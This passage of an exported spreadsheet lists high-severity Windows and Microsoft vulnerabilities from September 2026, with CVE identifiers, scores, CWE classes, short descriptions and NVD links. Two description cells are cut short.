          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t>
        </is>
      </c>
    </row>
    <row r="1952">
      <c r="A1952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68878</t>
        </is>
      </c>
      <c r="C1952" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1952" s="5" t="inlineStr"/>
      <c r="F1952" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1952" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1952" s="5" t="inlineStr"/>
      <c r="I1952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1952" s="5" t="inlineStr"/>
      <c r="K1952" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1952" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t>
        </is>
      </c>
    </row>
    <row r="1953">
      <c r="A1953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68880</t>
        </is>
      </c>
      <c r="C1953" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1953" s="5" t="inlineStr"/>
      <c r="F1953" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1953" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1953" s="5" t="inlineStr"/>
      <c r="I1953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1953" s="5" t="inlineStr"/>
      <c r="K1953" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L1953" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t>
        </is>
      </c>
    </row>
    <row r="1954">
      <c r="A1954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68894</t>
        </is>
      </c>
      <c r="C1954" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1954" s="5" t="inlineStr"/>
      <c r="F1954" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1954" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1954" s="5" t="inlineStr"/>
      <c r="I1954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1954" s="5" t="inlineStr"/>
      <c r="K1954" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1954" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t>
        </is>
      </c>
    </row>
    <row r="1955">
      <c r="A1955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69271</t>
        </is>
      </c>
      <c r="C1955" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1955" s="5" t="inlineStr"/>
      <c r="F1955" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1955" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1955" s="5" t="inlineStr"/>
      <c r="I1955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1955" s="5" t="inlineStr"/>
      <c r="K1955" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1955" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t>
        </is>
      </c>
    </row>
    <row r="1956">
      <c r="A1956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69301</t>
        </is>
      </c>
      <c r="C1956" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1956" s="5" t="inlineStr"/>
      <c r="F1956" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1956" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1956" s="5" t="inlineStr"/>
      <c r="I1956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1956" s="5" t="inlineStr"/>
      <c r="K1956" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1956" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t>
        </is>
      </c>
    </row>
    <row r="1957">
      <c r="A1957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1957" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69322</t>
        </is>
      </c>
      <c r="C1957" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1957" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1957" s="5" t="inlineStr"/>
      <c r="F1957" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1957" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1957" s="5" t="inlineStr"/>
      <c r="I1957" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1957" s="5" t="inlineStr"/>
      <c r="K1957" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1957" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1957" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t>
        </is>
      </c>
    </row>
    <row r="1958">
      <c r="A1958" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1958" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="C1958" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1958" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1958" s="5" t="inlineStr"/>
      <c r="F1958" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1958" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1958" s="5" t="inlineStr"/>
      <c r="I1958" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1958" s="5" t="inlineStr"/>
      <c r="K1958" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1958" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1958" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="1959">
      <c r="A1959" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1959" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69346</t>
        </is>
      </c>
      <c r="C1959" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1959" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1959" s="5" t="inlineStr"/>
      <c r="F1959" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1959" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1959" s="5" t="inlineStr"/>
      <c r="I1959" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1959" s="5" t="inlineStr"/>
      <c r="K1959" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1959" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1959" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t>
        </is>
      </c>
    </row>
    <row r="1960">
      <c r="A1960" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1960" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69365</t>
        </is>
      </c>
      <c r="C1960" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1960" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1960" s="5" t="inlineStr"/>
      <c r="F1960" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1960" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1960" s="5" t="inlineStr"/>
      <c r="I1960" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1960" s="5" t="inlineStr"/>
      <c r="K1960" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1960" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1960" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t>
        </is>
      </c>
    </row>
    <row r="1961">
      <c r="A1961" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1961" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69371</t>
        </is>
      </c>
      <c r="C1961" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1961" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1961" s="5" t="inlineStr"/>
      <c r="F1961" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1961" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1961" s="5" t="inlineStr"/>
      <c r="I1961" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1961" s="5" t="inlineStr"/>
      <c r="K1961" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1961" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1961" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t>
        </is>
      </c>
    </row>
    <row r="1962">
      <c r="A1962" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1962" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="C1962" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1962" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1962" s="5" t="inlineStr"/>
      <c r="F1962" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1962" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1962" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1962" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1962" s="5" t="inlineStr"/>
      <c r="K1962" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1962" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M1962" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="1963">
      <c r="A1963" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69418</t>
        </is>
      </c>
      <c r="C1963" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1963" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1963" s="5" t="inlineStr"/>
      <c r="F1963" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1963" s="5" t="inlineStr"/>
      <c r="H1963" s="5" t="inlineStr"/>
      <c r="I1963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1963" s="5" t="inlineStr"/>
      <c r="K1963" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1963" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1963" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t>
        </is>
      </c>
    </row>
    <row r="1964">
      <c r="A1964" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="C1964" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1964" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1964" s="5" t="inlineStr"/>
      <c r="F1964" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1964" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1964" s="5" t="inlineStr"/>
      <c r="I1964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1964" s="5" t="inlineStr"/>
      <c r="K1964" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1964" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1964" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="1965">
      <c r="A1965" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69427</t>
        </is>
      </c>
      <c r="C1965" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1965" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1965" s="5" t="inlineStr"/>
      <c r="F1965" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1965" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1965" s="5" t="inlineStr"/>
      <c r="I1965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1965" s="5" t="inlineStr"/>
      <c r="K1965" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1965" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1965" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t>
        </is>
      </c>
    </row>
    <row r="1966">
      <c r="A1966" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69458</t>
        </is>
      </c>
      <c r="C1966" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1966" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1966" s="5" t="inlineStr"/>
      <c r="F1966" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1966" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1966" s="5" t="inlineStr"/>
      <c r="I1966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1966" s="5" t="inlineStr"/>
      <c r="K1966" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1966" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1966" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t>
        </is>
      </c>
    </row>
    <row r="1967">
      <c r="A1967" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69462</t>
        </is>
      </c>
      <c r="C1967" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1967" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1967" s="5" t="inlineStr"/>
      <c r="F1967" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1967" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1967" s="5" t="inlineStr"/>
      <c r="I1967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1967" s="5" t="inlineStr"/>
      <c r="K1967" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1967" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1967" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t>
        </is>
      </c>
    </row>
    <row r="1968">
      <c r="A1968" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69481</t>
        </is>
      </c>
      <c r="C1968" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1968" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1968" s="5" t="inlineStr"/>
      <c r="F1968" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1968" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1968" s="5" t="inlineStr"/>
      <c r="I1968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1968" s="5" t="inlineStr"/>
      <c r="K1968" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1968" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1968" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t>
        </is>
      </c>
    </row>
    <row r="1969">
      <c r="A1969" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69503</t>
        </is>
      </c>
      <c r="C1969" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1969" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1969" s="5" t="inlineStr"/>
      <c r="F1969" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1969" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1969" s="5" t="inlineStr"/>
      <c r="I1969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1969" s="5" t="inlineStr"/>
      <c r="K1969" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1969" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t>
        </is>
      </c>
    </row>
    <row r="1970">
      <c r="A1970" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69505</t>
        </is>
      </c>
      <c r="C1970" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1970" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1970" s="5" t="inlineStr"/>
      <c r="F1970" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1970" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1970" s="5" t="inlineStr"/>
      <c r="I1970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1970" s="5" t="inlineStr"/>
      <c r="K1970" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1970" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t>
        </is>
      </c>
    </row>
    <row r="1971">
      <c r="A1971" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69512</t>
        </is>
      </c>
      <c r="C1971" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1971" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1971" s="5" t="inlineStr"/>
      <c r="F1971" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1971" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1971" s="5" t="inlineStr"/>
      <c r="I1971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1971" s="5" t="inlineStr"/>
      <c r="K1971" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L1971" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t>
        </is>
      </c>
    </row>
    <row r="1972">
      <c r="A1972" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69619</t>
        </is>
      </c>
      <c r="C1972" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1972" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1972" s="5" t="inlineStr"/>
      <c r="F1972" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1972" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1972" s="5" t="inlineStr"/>
      <c r="I1972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1972" s="5" t="inlineStr"/>
      <c r="K1972" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1972" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t>
        </is>
      </c>
    </row>
    <row r="1973">
      <c r="A1973" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69623</t>
        </is>
      </c>
      <c r="C1973" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1973" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1973" s="5" t="inlineStr"/>
      <c r="F1973" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1973" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1973" s="5" t="inlineStr"/>
      <c r="I1973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1973" s="5" t="inlineStr"/>
      <c r="K1973" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1973" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t>
        </is>
      </c>
    </row>
    <row r="1974">
      <c r="A1974" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69625</t>
        </is>
      </c>
      <c r="C1974" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1974" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1974" s="5" t="inlineStr"/>
      <c r="F1974" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1974" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1974" s="5" t="inlineStr"/>
      <c r="I1974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1974" s="5" t="inlineStr"/>
      <c r="K1974" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1974" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69625</t>
        </is>
      </c>
    </row>
    <row r="1975">
      <c r="A1975" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69643</t>
        </is>
      </c>
      <c r="C1975" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1975" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1975" s="5" t="inlineStr"/>
      <c r="F1975" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1975" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1975" s="5" t="inlineStr"/>
      <c r="I1975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1975" s="5" t="inlineStr"/>
      <c r="K1975" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1975" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69643</t>
        </is>
      </c>
    </row>
    <row r="1976">
      <c r="A1976" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
